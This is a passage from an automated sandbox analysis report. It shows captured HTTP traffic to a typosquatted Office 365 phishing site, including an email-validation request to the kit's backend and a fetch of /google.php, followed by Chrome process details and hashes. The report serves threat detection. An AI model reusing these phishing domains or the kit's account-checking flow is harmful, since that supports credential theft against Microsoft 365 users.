                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Origin: https://offce365.auramisteriosafyr.it.com
                                                                                        Sec-Fetch-Site: same-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://offce365.auramisteriosafyr.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:01:32 UTC36OUTData Raw: 64 6f 3d 63 68 65 63 6b 26 65 6d 61 69 6c 3d 63 68 61 6d 70 69 6f 6e 40 63 68 61 6d 70 69 6f 6e 2e 6e 65 74
                                                                                        Data Ascii: do=check&email=champion@champion.net
                                                                                        2025-03-24 04:01:33 UTC979INHTTP/1.1 200 OK
                                                                                        Date: Mon, 24 Mar 2025 04:01:33 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.0.30
                                                                                        Access-Control-Allow-Origin: https://offce365.auramisteriosafyr.it.com
                                                                                        Access-Control-Allow-Credentials: true
                                                                                        Access-Control-Max-Age: 86400
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nHfv6Wk1LOnJP4qQomXnhZ70P592r2H6FSA3ZEiV5%2Bf8CGp6zlilYjNIMHLgJEVaKvlgN7M80EyjPZTJKlpsJ5Usu30HHGwQyL%2FpZCGVOFMthYa9b7PA2SfU3PaMGXDPThCDU5P4dVWRazo53Dpatg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 925344960bc242d0-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=95485&min_rtt=95418&rtt_var=20233&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2864&recv_bytes=1367&delivery_rate=38952&cwnd=236&unsent_bytes=0&cid=eec259ee426f129b&ts=750&x=0"
                                                                                        2025-03-24 04:01:33 UTC105INData Raw: 36 33 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 6e 20 61 63 63 6f 75 6e 74 20 77 69 74 68 20 74 68 61 74 20 75 73 65 72 6e 61 6d 65 2e 20 54 72 79 20 61 6e 6f 74 68 65 72 20 61 63 63 6f 75 6e 74 2e 22 7d 0d 0a
                                                                                        Data Ascii: 63{"status":"error","message":"We couldn't find an account with that username. Try another account."}
                                                                                        2025-03-24 04:01:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        35192.168.2.1649772104.21.59.54436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:01:33 UTC403OUTGET /google.php HTTP/1.1
                                                                                        Host: ydpj.auramisteriosafyr.it.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:01:34 UTC839INHTTP/1.1 200 OK
                                                                                        Date: Mon, 24 Mar 2025 04:01:34 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.0.30
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tdl8rG3gHTpuNwykiAg9o9beA3Q0Xxyxc6m61KGs18hU01jO1FEJtXrTecfotT%2FHHqxN6iNEie37VrTU97FZk8u%2FhLYabwdFUBymSEsWv%2FzUrXh7ETd2v8QZUTL9htGhHsk3ZpdS5ZGfxn%2BPXSmWLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 9253449bfd3d7d0c-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=96556&min_rtt=96338&rtt_var=20651&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2863&recv_bytes=975&delivery_rate=38408&cwnd=200&unsent_bytes=0&cid=97b0c3e5a7ffbe22&ts=415&x=0"
                                                                                        2025-03-24 04:01:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        050100s020406080100

                                                                                        Click to jump to process

                                                                                        050100s0.0050100MB

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:00:00:00
                                                                                        Start date:24/03/2025
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                        Imagebase:0x7ff77eaf0000
                                                                                        File size:3'388'000 bytes
                                                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        Target ID:1
                                                                                        Start time:00:00:00
                                                                                        Start date:24/03/2025
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,4225585014450391825,7605761118986401797,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2248 /prefetch:3
                                                                                        Imagebase:0x7ff77eaf0000
                                                                                        File size:3'388'000 bytes
                                                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        Target ID:2
                                                                                        Start time:00:00:02
                                                                                        Start date:24/03/2025
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://offce365.auramisteriosafyr.it.com/CM4kN/"
                                                                                        Imagebase:0x7ff77eaf0000
                                                                                        File size:3'388'000 bytes
                                                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true
                                                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                        No disassembly